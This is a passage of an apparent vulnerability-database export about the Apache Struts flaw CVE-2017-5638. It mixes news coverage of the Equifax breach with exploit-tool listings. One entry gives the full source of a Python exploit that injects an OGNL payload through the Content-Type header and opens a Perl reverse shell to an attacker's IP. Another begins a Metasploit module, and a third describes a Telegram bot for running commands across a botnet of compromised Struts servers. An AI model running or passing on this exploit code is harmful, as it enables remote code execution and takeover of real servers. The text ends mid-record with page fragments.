obtain a free copy of their credit reports from each of the three major bureaus annually.\n\nIn [another screen shot](<http://xss.cx/2017/03/12/txt/cve-2017-5638-consumerexperianin-exploit-poc-content-type-http-header-example.html>) apparently made that same day and uploaded to xss[dot]cx, we can see evidence that the Apache Struts flaw also was present in Experian's Web properties.\n\nEquifax has said the unauthorized access occurred from mid-May through July 2017, suggesting either that the company's Web applications were still unpatched in mid-May or that the attackers broke in earlier but did not immediately abuse their access.\n\nIt remains unclear when exactly Equifax managed to fully eliminate the Apache Struts flaw from their various Web server applications. But one thing we do know for sure: The hacker(s) got in before Equifax closed the hole, and their presence wasn't discovered until July 29, 2017.\n\n**Update, Sept. 15, 12:31 p.m. ET:** Visa has updated their advisory about these 200,000+ credit cards stolen in the Equifax breach. Visa now says it believes the records also included the cardholder's Social Security number and address, suggesting that (ironically enough) the accounts were stolen from people who were signing up for credit monitoring services through Equifax.\n\nEquifax also clarified the breach timeline to note that it patched the Apache Struts flaw in its Web applications only after taking the hacked system(s) offline on July 30, 2017. Which means Equifax left its systems unpatched for more than four months after a patch (and exploit code to attack the flaw) was publicly available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-14T18:03:12", "type": "krebs", "title": "Equifax Hackers Stole 200k Credit Card Accounts in One Fell Swoop", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-14T18:03:12", "id": "KREBS:EE70929DE902D9B233E209B73C1AD4A0", "href": "https://krebsonsecurity.com/2017/09/equifax-hackers-stole-200k-credit-card-accounts-in-one-fell-swoop/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2023-12-06T17:02:20", "description": "[![](https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png)](<https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png>)\n\n \n** An exploit for Apache Struts CVE-2017-5638** \n \n** ** Usage ** ** \n \n** Testing a single URL. ** \n\n \n \n python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'\n\n \n** Testing a list of URLs. ** \n\n \n \n python struts-pwn.py --list 'urls.txt' -c 'id'\n\n \n** Checking if the vulnerability exists against a single URL. ** \n\n \n \n python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'\n\n \n** Checking if the vulnerability exists against a list of URLs. ** \n\n \n \n python struts-pwn.py --check --list 'urls.txt'\n\n \n** ** Requirements ** ** \n\n\n * Python2 or Python3 \n * requests \n \n** ** Legal Disclaimer ** ** \nThis project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. \n \n** ** Author ** ** \n_ Mazin Ahmed _ \n\n\n * Website: [ https://mazinahmed.net ](<https://mazinahmed.net/>)\n * Email: _ mazin AT mazinahmed DOT net _\n * Twitter: [ https://twitter.com/mazen160 ](<https://twitter.com/mazen160>)\n * Linkedin: [ http://linkedin.com/in/infosecmazinahmed](<http://linkedin.com/in/infosecmazinahmed>)\n \n\n\n** [ Download struts-pwn ](<https://github.com/mazen160/struts-pwn>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T13:34:00", "type": "kitploit", "title": "struts-pwn - An exploit for Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T13:34:05", "id": "KITPLOIT:1841841790447853746", "href": "http://www.kitploit.com/2017/03/struts-pwn-exploit-for-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:02:20", "description": "[![](https://2.bp.blogspot.com/-XZN2TA7nQZ0/WGSL3ia76KI/AAAAAAAAGuE/8pxmxtrizn8Yu1Y6iIArXYBgsL3Rhww3ACLcB/s320/telegram-bot.png)](<https://2.bp.blogspot.com/-XZN2TA7nQZ0/WGSL3ia76KI/AAAAAAAAGuE/8pxmxtrizn8Yu1Y6iIArXYBgsL3Rhww3ACLcB/s1600/telegram-bot.png>)\n\n \nTelegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) \n \n** Dependencies ** \n\n \n \n pip install -r requeriments.txt \n\n \n** Config ** \n\n \n \n Create a telegram bot, save the API token in config/token.conf\n Create a telegram group, save the group id in config/group.conf\n\n \n** Start ** \npython strutszeiro.py \n \n** Telegram Usage ** \n\n \n \n /add url - test vulnerability and add the new server\n /exploit url *cmd - execute commands in a specific server (you need to use the * caracter)\n /botnet cmd - execute commands in all servers\n /list - show all servers in botnet\n /total - show total of servers in botnet\n\nThanks to [ @btamburi ](<https://twitter.com/BrenoTamburi>) \n \n \n\n\n** [ Download strutszeiro ](<https://github.com/mthbernardes/strutszeiro>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T17:30:00", "type": "kitploit", "title": "strutszeiro - Telegram Bot to manage botnets created with struts vulnerability (CVE-2017-5638)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T17:30:13", "id": "KITPLOIT:9079806502812490909", "href": "http://www.kitploit.com/2017/03/strutszeiro-telegram-bot-to-manage.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-11T00:37:47", "description": "[![](https://4.bp.blogspot.com/-ueegtNhcGOM/WMtkR8p9hRI/AAAAAAAAHbo/eHq-bF-Q2GgzOPgzXd9XIaTs4L-JlNr7wCLcB/s640/Struts2Shell.png)](<https://4.bp.blogspot.com/-ueegtNhcGOM/WMtkR8p9hRI/AAAAAAAAHbo/eHq-bF-Q2GgzOPgzXd9XIaTs4L-JlNr7wCLcB/s1600/Struts2Shell.png>)\n\n \nImproves manipulation and sending commands to the vulnerable Apache Struts server using a shell. \n \n**Usage:** \n\n \n \n python Struts2Shell.py\n\n \n\n\n** [ Download Struts2Shell ](<https://github.com/s1kr10s/Struts2Shell>) **\n", "cvss3": {}, "published": "2017-03-17T14:22:00", "type": "kitploit", "title": "Struts2Shell - Interactive Shell Command to Exploit Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-17T14:22:01", "id": "KITPLOIT:2304674796555328667", "href": "http://www.kitploit.com/2017/03/struts2shell-interactive-shell-command.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "canvas": [{"lastseen": "2021-07-28T14:33:33", "description": "**Name**| struts_ognl \n---|--- \n**CVE**| CVE-2017-5638 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| struts_ognl \n**Notes**| CVE Name: CVE-2017-5638 \nVENDOR: Apache \nNOTES: \nThe JAR Server will listen on the port provided in the UI. However, if that port is unavailable, \na random one will be chosen. \n \nExample vulnerable application: struts2-showcase in Struts 2.3.31 . \nExample URL: http://172.16.196.137:8080/struts2-showcase/showcase.action \n \nVersions tested: \n \n> Ubuntu Linux 14.04.3 \nJava 7u22/Tomcat 8.5.11/Struts 2.3.31 \n \nRepeatability: One shot \nReferences: ['http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/', 'http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html', 'https://github.com/tengzhangchao/Struts2_045-Poc'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-11T02:59:00", "type": "canvas", "title": "Immunity Canvas: STRUTS_OGNL", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-11T02:59:00", "id": "STRUTS_OGNL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/struts_ognl", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2017-09-14T17:30:57", "description": "### [updates 9/14/2017]\n\nEquifax has released information and confirmed the vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) that was used in this breach after several days of intense scrutiny around Apache Struts. To make matters worse, there already was a patch available for this flaw in March 2017, two months prior to the incident.\n\n_**1) Updated information on U.S. website application vulnerability.**_ \n_Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement._\n\n### [updates 9/12/2017]\n\nEquifax's efforts in response to this incident can be followed at www.equifaxsecurity2017.com, but the[ site has been called](<https://krebsonsecurity.com/2017/09/equifax-breach-response-turns-dumpster-fire/>) \"completely broken at best, and little more than a stalling tactic or sham at worst.\" And [ isn\u2019t working for many people](<https://www.businessinsider.nl/equifax-data-breach-site-check-angry-response-2017-9/>). So, we leave it up to your best judgment whether you should pay that site a visit .\n\nOver 30 lawsuits have been filed against Equifax following the breach [according to Reuters](<http://www.reuters.com/article/us-equifax-cyber-lawsuits/lawsuits-against-equifax-pile-up-after-massive-data-breach-idUSKCN1BM2E3>).\n\n[Quartz reported](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) that the vulnerability they mentioned was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. The vulnerability announced on Sept. 4 has existed in Struts since 2008.\n\nApache responded to that report with [this Apache Struts Statement on Equifax Security Breach](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>).\n\n \n\nOn July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax's overall security posture.\n\n[According to Equifax](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), online criminals maintained their presence from mid-May through July 2017 and had access to:\n\n * Names\n * Social Security numbers\n * Birth dates\n * Addresses\n * Driver\u2019s license numbers (in some cases)\n * Credit card numbers (for approx. 209,000 U.S. consumers)\n\nIt also said that some personal information for certain UK and Canadian residents was part of this breach.\n\nThis is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.\n\nEquifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found by going to [equifaxsecurity2017.com](<https://www.equifaxsecurity2017.com/>), a website Equifax has just set up.\n\nThe post [Equifax breach: What you need to know [updated]](<https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-08T07:02:47", "type": "malwarebytes", "title": "Equifax breach: What you need to know [updated]", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-08T07:02:47", "id": "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "href": "https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ \n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'http

PoC Exploit Targeting Apache Struts Surfaces on GitHub

Description

Related